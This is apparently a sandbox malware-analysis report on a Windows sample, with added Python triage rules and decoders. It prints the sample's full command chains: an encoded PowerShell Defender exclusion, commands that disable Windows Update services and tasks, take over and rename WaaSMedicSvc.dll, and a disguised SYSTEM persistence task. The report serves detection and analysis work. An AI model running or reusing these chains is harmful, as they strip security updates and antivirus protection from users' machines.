Analysis
- max time kernel: 95s
- max time network: 45s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 13-05-2022 17:54

Static task: static1
Behavioral task: behavioral1
Sample: minfx.exe
Resource: win7-20220414-en

General
- Target: minfx.exe
- Size: 4.2MB
- MD5: 8268ff95b3aaea6d6de8f02a73c323d2
- SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
- SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
- SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  pid   process
  1036  updater.exe
- Possible privilege escalation attempt (2 IoCs)
  pid   process
  1296  takeown.exe
  688   icacls.exe
- Stops running service(s) (3 TTPs)
- Loads dropped DLL (1 IoC)
  pid   process
  1784  cmd.exe
- Modifies file permissions (1 TTP, 2 IoCs)
  pid   process
  1296  takeown.exe
  688   icacls.exe
- Drops file in System32 directory (1 IoC)
  description                   ioc                                                                                                                          process
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   process
  1632  powershell.exe
  1092  conhost.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                 pid   process
  Token: SeDebugPrivilege     1632  powershell.exe
  Token: SeShutdownPrivilege  1544  powercfg.exe
  Token: SeShutdownPrivilege  896   powercfg.exe
  Token: SeShutdownPrivilege  1784  powercfg.exe
  Token: SeShutdownPrivilege  364   powercfg.exe
  Token: SeDebugPrivilege     1092  conhost.exe
- Suspicious use of WriteProcessMemory (64 IoCs; the listing is cut off at 64 events, so the takeown, icacls, reg and schtasks children of PID 588 shown in the process tree do not appear here)
  pid   process      target pid  target process  events
  1992  minfx.exe    1092        conhost.exe     4
  1092  conhost.exe  1836        cmd.exe         3
  1836  cmd.exe      1632        powershell.exe  3
  1092  conhost.exe  588         cmd.exe         3
  1092  conhost.exe  776         cmd.exe         3
  588   cmd.exe      1156        sc.exe          3
  588   cmd.exe      1660        sc.exe          3
  776   cmd.exe      1544        powercfg.exe    3
  588   cmd.exe      1000        sc.exe          3
  588   cmd.exe      1760        sc.exe          3
  588   cmd.exe      1620        sc.exe          3
  776   cmd.exe      896         powercfg.exe    3
  588   cmd.exe      1696        sc.exe          3
  776   cmd.exe      1784        powercfg.exe    3
  776   cmd.exe      364         powercfg.exe    3
  588   cmd.exe      1444        sc.exe          3
  588   cmd.exe      1736        sc.exe          3
  1092  conhost.exe  2032        cmd.exe         3
  588   cmd.exe      1100        sc.exe          3
  2032  cmd.exe      1608        schtasks.exe    3
  588   cmd.exe      904         sc.exe          3
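The signatures above fire per process; most of what this sample does is visible from process-creation command lines alone (Sysmon Event ID 1, or Security 4688 with command-line auditing), because every step is a plain `cmd /c` chain of built-in tools. The following is an added example, not sandbox code and not the sample's code, showing how a triage rule set over those command lines would tag the chain. The command lines it tests against are copied from the process tree in this report; the tag names and the `&`-splitting of the `cmd /c` wrapper are this example's own conventions.

```python
"""Command-line triage heuristics modelled on the process tree in this report.

Added example; not sandbox code and not the sample's code.  The command lines in
POWERCFG_CHAIN, SCHTASKS_CHAIN and UPDATE_CHAIN_EXCERPT are copied from the report's
process tree; the tag names and the cmd /c splitting are this example's own conventions.
Feed it the CommandLine field of process-creation events (Sysmon EID 1, Security 4688).
"""
import re
from typing import Optional

# Windows Update components the report's chain stops, disables or breaks.
UPDATE_SERVICES = {"wuauserv", "bits", "dosvc", "usosvc", "waasmedicsvc"}
UPDATE_TASK_FOLDERS = ("\\microsoft\\windows\\windowsupdate\\",
                       "\\microsoft\\windows\\updateorchestrator\\")


def split_chain(cmdline: str) -> list[str]:
    """Drop a leading '"...\\cmd.exe" cmd /c' wrapper and split an &-joined chain.

    The report's chains never quote an ampersand, so a plain split is enough here.
    """
    body = re.sub(r'^\s*"[^"]*cmd\.exe"\s+cmd\s+/c\s+', "", cmdline, flags=re.I)
    return [part.strip() for part in body.split("&") if part.strip()]


def _opt(args: list[str], flag: str) -> Optional[str]:
    """Value that follows a switch such as /v, /d, /tn, /tr or /ru (None if absent)."""
    for i, a in enumerate(args[:-1]):
        if a == flag:
            return args[i + 1]
    return None


def classify(sub: str) -> set[str]:
    """Tags raised by one sub-command; an empty set means nothing of interest."""
    toks = re.findall(r'"[^"]*"|\S+', sub.lower())
    if not toks:
        return set()
    exe = toks[0].strip('"').rsplit("\\", 1)[-1].removesuffix(".exe")
    # the report shows doubled backslashes in paths and registry keys; normalise them
    args = [t.strip('"').replace("\\\\", "\\") for t in toks[1:]]
    tags: set[str] = set()

    if exe == "sc" and len(args) >= 2 and args[0] in ("stop", "config", "failure") \
            and args[1] in UPDATE_SERVICES:
        tags.add("impair-defenses:windows-update-service")
    if exe in ("takeown", "icacls", "rename") and any("\\system32\\" in a for a in args):
        tags.add(f"impair-defenses:system32-{exe}")
    if exe == "reg" and args[:1] == ["add"] and len(args) > 1:
        key, name, data = args[1], _opt(args, "/v"), _opt(args, "/d")
        if "\\services\\" in key and name == "start" and data == "4":
            tags.add("impair-defenses:service-start-disabled")
        if "\\services\\" in key and name == "failureactions":
            tags.add("impair-defenses:service-recovery-changed")
        if key.endswith("\\windowsupdate\\au") and name == "noautoupdate" and data == "1":
            tags.add("impair-defenses:windows-update-policy")
    if exe == "schtasks":
        tn, tr = _opt(args, "/tn") or "", _opt(args, "/tr") or ""
        if "/change" in args and "/disable" in args and tn.startswith(UPDATE_TASK_FOLDERS):
            tags.add("impair-defenses:update-task-disabled")
        if "/create" in args and _opt(args, "/ru") == "system" and "\\appdata\\" in tr:
            tags.add("persistence:system-task-runs-appdata-binary")
    if exe == "powercfg" and "/x" in args and "0" in args \
            and any(a.endswith(("-timeout-ac", "-timeout-dc")) for a in args):
        tags.add("impair-defenses:sleep-and-hibernate-disabled")
    if exe == "powershell" and any(a == "-ec" or (len(a) >= 2 and "-encodedcommand".startswith(a))
                                   for a in args):
        tags.add("defense-evasion:encoded-powershell")
    return tags


def triage(cmdline: str) -> set[str]:
    """Union of tags over every sub-command of one (possibly cmd /c-wrapped) command line."""
    tags: set[str] = set()
    for sub in split_chain(cmdline):
        tags |= classify(sub)
    return tags


# Copied from the report's process tree: the two short cmd /c chains and an excerpt of the long one.
POWERCFG_CHAIN = (r'"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 '
                  r'& powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 '
                  r'& powercfg /x -standby-timeout-dc 0')
SCHTASKS_CHAIN = (r'"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest '
                  r'/ru "System" /tn "GoogleUpdateTaskMachineQC" '
                  r'/tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"')
UPDATE_CHAIN_EXCERPT = [
    r"sc stop WaaSMedicSvc",
    r"sc config wuauserv start= disabled",
    r'sc failure bits reset= 0 actions= ""',
    r"takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll",
    r"icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q",
    r"rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll",
    r'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f',
    r"reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f",
    r'SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE',
]


def triage_report() -> set[str]:
    """Every tag the report's command lines above raise."""
    tags = triage(POWERCFG_CHAIN) | triage(SCHTASKS_CHAIN)
    for sub in UPDATE_CHAIN_EXCERPT:
        tags |= classify(sub)
    return tags


if __name__ == "__main__":
    for tag in sorted(triage_report()):
        print(tag)
```

Two caveats when reading the tree with this in mind. First, every chain is spawned by conhost.exe (PID 1092), which was started with the sample's own path as its argument and holds 4.2MB private regions the size of the sample (see the memory dumps for PID 1092), so ancestry pivots should start at that conhost.exe rather than at minfx.exe. Second, the "Drops file in System32 directory" hit is powershell.exe writing its own Start Menu shortcut (the unexpanded `%ProgramData%` under `System32` in the path gives it away) and is not something these rules score.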
Processes
Process tree (bracketed number = depth in the tree; children are indented under their parent):

[1] C:\Users\Admin\AppData\Local\Temp\minfx.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\conhost.exe
      cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\sc.exe
          cmdline: sc stop wuauserv
      [4] C:\Windows\system32\sc.exe
          cmdline: sc stop bits
      [4] C:\Windows\system32\sc.exe
          cmdline: sc stop dosvc
      [4] C:\Windows\system32\sc.exe
          cmdline: sc stop UsoSvc
      [4] C:\Windows\system32\sc.exe
          cmdline: sc stop WaaSMedicSvc
      [4] C:\Windows\system32\sc.exe
          cmdline: sc config wuauserv start= disabled
      [4] C:\Windows\system32\sc.exe
          cmdline: sc failure wuauserv reset= 0 actions= ""
      [4] C:\Windows\system32\sc.exe
          cmdline: sc config bits start= disabled
      [4] C:\Windows\system32\sc.exe
          cmdline: sc failure bits reset= 0 actions= ""
      [4] C:\Windows\system32\sc.exe
          cmdline: sc config dosvc start= disabled
      [4] C:\Windows\system32\sc.exe
          cmdline: sc failure dosvc reset= 0 actions= ""
      [4] C:\Windows\system32\sc.exe
          cmdline: sc config UsoSvc start= disabled
      [4] C:\Windows\system32\sc.exe
          cmdline: sc failure UsoSvc reset= 0 actions= ""
      [4] C:\Windows\system32\sc.exe
          cmdline: sc config wuauserv start= disabled
      [4] C:\Windows\system32\sc.exe
          cmdline: sc failure wuauserv reset= 0 actions= ""
      [4] C:\Windows\system32\takeown.exe
          cmdline: takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe
          cmdline: icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\reg.exe
          cmdline: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
      [4] C:\Windows\system32\reg.exe
          cmdline: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
      [4] C:\Windows\system32\reg.exe
          cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
      [4] C:\Windows\system32\reg.exe
          cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      [4] C:\Windows\system32\reg.exe
          cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      [4] C:\Windows\system32\reg.exe
          cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\powercfg.exe
          cmdline: powercfg /x -hibernate-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\powercfg.exe
          cmdline: powercfg /x -hibernate-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\powercfg.exe
          cmdline: powercfg /x -standby-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\powercfg.exe
          cmdline: powercfg /x -standby-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          - Creates scheduled task(s)

    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        - Loads dropped DLL

      [4] C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          cmdline: C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          - Executes dropped EXE
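Two arguments in the tree above cannot be read as typed: the base64 blob handed to `powershell -EncodedCommand`, and the REG_BINARY written to `WaaSMedicSvc\FailureActions`. The following is an added example, not part of the sandbox report or of the sample, that decodes both. The two values are copied verbatim from the report; the only assumption is the layout of the FailureActions blob, taken here as the Win32 `SERVICE_FAILURE_ACTIONS` header (five DWORDs, with the pointer fields stored as offsets from the start of the value) followed by the `SC_ACTION` array.

```python
"""Decoders for the two opaque arguments in the process tree above.

Added example; not part of the sandbox report or of the sample.  ENCODED_COMMAND and
FAILURE_ACTIONS_HEX are copied verbatim from the report.  The FailureActions layout
assumed here is the Win32 SERVICE_FAILURE_ACTIONS header (five DWORDs, pointers stored
as offsets from the start of the blob) followed by the SC_ACTION array.
"""
import base64
import re
import struct

ENCODED_COMMAND = "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
FAILURE_ACTIONS_HEX = "000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000"

SC_ACTION_TYPES = {0: "SC_ACTION_NONE", 1: "SC_ACTION_RESTART",
                   2: "SC_ACTION_REBOOT", 3: "SC_ACTION_RUN_COMMAND"}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the script text as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> block comments (used here as filler between tokens) and collapse whitespace."""
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())


def defender_exclusions(script: str) -> list[str]:
    """Paths passed to Add-MpPreference -ExclusionPath, split on commas (no spaces inside the list)."""
    m = re.search(r"Add-MpPreference\s+-ExclusionPath\s+@?\(?([^)\s]+)", script)
    return [p.strip() for p in m.group(1).split(",")] if m else []


def parse_failure_actions(hexblob: str) -> dict:
    """Parse a FailureActions REG_BINARY value into reset period and recovery actions."""
    blob = bytes.fromhex(hexblob)
    # dwResetPeriod, lpRebootMsg, lpCommand, cActions, lpsaActions (pointers serialised as offsets)
    reset_period, reboot_msg_off, command_off, count, actions_off = struct.unpack_from("<5I", blob, 0)
    actions = [
        {"type": SC_ACTION_TYPES.get(t, f"unknown({t})"), "delay_ms": delay}
        for t, delay in (struct.unpack_from("<2I", blob, actions_off + 8 * i) for i in range(count))
    ]
    return {"reset_period_s": reset_period, "reboot_msg": reboot_msg_off != 0,
            "run_command": command_off != 0, "actions": actions}


def recovery_disabled(parsed: dict) -> bool:
    """True when no failure action ever restarts the service (the SCM does nothing on crash or kill)."""
    return all(a["type"] == "SC_ACTION_NONE" for a in parsed["actions"])


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED_COMMAND)
    print("raw   :", script)
    print("clean :", strip_block_comments(script))
    print("excl  :", defender_exclusions(strip_block_comments(script)))
    fa = parse_failure_actions(FAILURE_ACTIONS_HEX)
    print("WaaSMedicSvc FailureActions:", fa, "recovery disabled:", recovery_disabled(fa))
```

Decoded, the PowerShell is `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force` wrapped in four throwaway `<# ... #>` comments, i.e. a Defender exclusion for the user profile and the whole system drive. The FailureActions blob has a reset period of 0 and three actions that are all `SC_ACTION_NONE` (the 120 s and 300 s delays are left in place but act on nothing), so the Service Control Manager will not restart the Windows Update Medic service after it is stopped; together with `Start=4`, the `takeown`/`icacls` grant of full control to Everyone (`*S-1-1-0:F`) and the rename of `WaaSMedicSvc.dll`, this keeps the service from repairing the update configuration the rest of the chain tears down.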
Downloads
- C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
  Filesize: 4.2MB
  MD5: 8268ff95b3aaea6d6de8f02a73c323d2
  SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
  SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
  SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
- \Users\Admin\AppData\Roaming\Chrome\updater.exe
  Filesize: 4.2MB
  MD5: 8268ff95b3aaea6d6de8f02a73c323d2
  SHA1: ae470145c4f5780315b52aa1c57ae0c04a2d18ca
  SHA256: 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
  SHA512: 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
- memory/364-75-0x0000000000000000-mapping.dmp
- memory/456-93-0x0000000000000000-mapping.dmp
- memory/580-89-0x0000000000000000-mapping.dmp
- memory/588-64-0x0000000000000000-mapping.dmp
- memory/660-85-0x0000000000000000-mapping.dmp
- memory/688-88-0x0000000000000000-mapping.dmp
- memory/692-86-0x0000000000000000-mapping.dmp
- memory/776-65-0x0000000000000000-mapping.dmp
- memory/824-101-0x0000000000000000-mapping.dmp
- memory/896-72-0x0000000000000000-mapping.dmp
- memory/904-81-0x0000000000000000-mapping.dmp
- memory/908-91-0x0000000000000000-mapping.dmp
- memory/932-95-0x0000000000000000-mapping.dmp
- memory/1000-69-0x0000000000000000-mapping.dmp
- memory/1004-99-0x0000000000000000-mapping.dmp
- memory/1036-104-0x0000000000000000-mapping.dmp
- memory/1092-56-0x000000001B680000-0x000000001BAA0000-memory.dmp (Filesize: 4.1MB)
- memory/1092-54-0x0000000000150000-0x000000000058E000-memory.dmp (Filesize: 4.2MB)
- memory/1092-55-0x000000001BAC0000-0x000000001BEFE000-memory.dmp (Filesize: 4.2MB)
- memory/1092-57-0x000007FEFB871000-0x000007FEFB873000-memory.dmp (Filesize: 8KB)
- memory/1100-79-0x0000000000000000-mapping.dmp
- memory/1156-66-0x0000000000000000-mapping.dmp
- memory/1296-87-0x0000000000000000-mapping.dmp
- memory/1320-96-0x0000000000000000-mapping.dmp
- memory/1436-92-0x0000000000000000-mapping.dmp
- memory/1444-76-0x0000000000000000-mapping.dmp
- memory/1512-100-0x0000000000000000-mapping.dmp
- memory/1544-68-0x0000000000000000-mapping.dmp
- memory/1576-82-0x0000000000000000-mapping.dmp
- memory/1608-80-0x0000000000000000-mapping.dmp
- memory/1620-71-0x0000000000000000-mapping.dmp
- memory/1632-63-0x00000000026EB000-0x000000000270A000-memory.dmp (Filesize: 124KB)
- memory/1632-59-0x0000000000000000-mapping.dmp
- memory/1632-61-0x000007FEED860000-0x000007FEEE3BD000-memory.dmp (Filesize: 11.4MB)
- memory/1632-62-0x00000000026E4000-0x00000000026E7000-memory.dmp (Filesize: 12KB)
- memory/1660-67-0x0000000000000000-mapping.dmp
- memory/1668-94-0x0000000000000000-mapping.dmp
- memory/1696-73-0x0000000000000000-mapping.dmp
- memory/1736-77-0x0000000000000000-mapping.dmp
- memory/1760-70-0x0000000000000000-mapping.dmp
- memory/1772-83-0x0000000000000000-mapping.dmp
- memory/1784-74-0x0000000000000000-mapping.dmp
- memory/1784-102-0x0000000000000000-mapping.dmp
- memory/1832-84-0x0000000000000000-mapping.dmp
- memory/1836-58-0x0000000000000000-mapping.dmp
- memory/1844-90-0x0000000000000000-mapping.dmp
- memory/1960-97-0x0000000000000000-mapping.dmp
- memory/1988-98-0x0000000000000000-mapping.dmp
- memory/2032-78-0x0000000000000000-mapping.dmp